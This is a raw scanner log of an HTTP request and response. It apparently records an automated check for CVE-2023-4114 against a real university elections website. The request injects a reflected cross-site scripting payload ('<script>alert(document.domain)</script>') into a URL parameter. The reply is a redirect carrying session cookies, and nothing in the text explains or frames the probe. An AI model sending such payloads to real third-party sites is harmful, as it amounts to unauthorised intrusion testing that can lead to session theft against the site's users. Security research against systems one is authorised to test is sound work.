[CVE-2023-4114] Dumped HTTP request for https://elections.union.unimelb.edu.au/index.php?controller=pjFront&action=pjActionSearch&session_id&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date


GET /index.php?controller=pjFront&action=pjActionSearch&session_id&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date HTTP/1.1
Host: elections.union.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2023-4114] Dumped HTTP response https://elections.union.unimelb.edu.au/index.php?controller=pjFront&action=pjActionSearch&session_id&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date

HTTP/1.1 302 Found
Connection: close
Content-Length: 122
Cache-Control: no-cache, no-store
Content-Type: text/html
Location: https://elections.union.unimelb.edu.au/index.php?controller=pjFront&action=pjActionSearch&session_id&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date
Set-Cookie: visid_incap_3220071=jQk73UNpRaiKT8bV2v/ofAtyk2gAAAAAQUIPAAAAAAC1cEKNM3dJ/oaUgtzbJOl8; expires=Thu, 06 Aug 2026 07:06:46 GMT; HttpOnly; path=/; Domain=.union.unimelb.edu.au; Secure; SameSite=None
Set-Cookie: incap_ses_237_3220071=FNukQ7vxL1Au57arov5JAwtyk2gAAAAACpTd/hMPviKsZBGjpkUG0w==; path=/; Domain=.union.unimelb.edu.au; Secure; SameSite=None
Strict-Transport-Security: max-age=31536000
X-Iinfo: 4-3056357-0 0NNN RT(1754493451428 69) q(0 -1 -1 -1) r(0 -1) B13(1,903758,0) U24


<HTML><HEAD><TITLE>Loading</TITLE></HEAD><BODY bgcolor="#ffffff"><H3 style="color: #ffffff">Loading</H3></BODY></HTML>

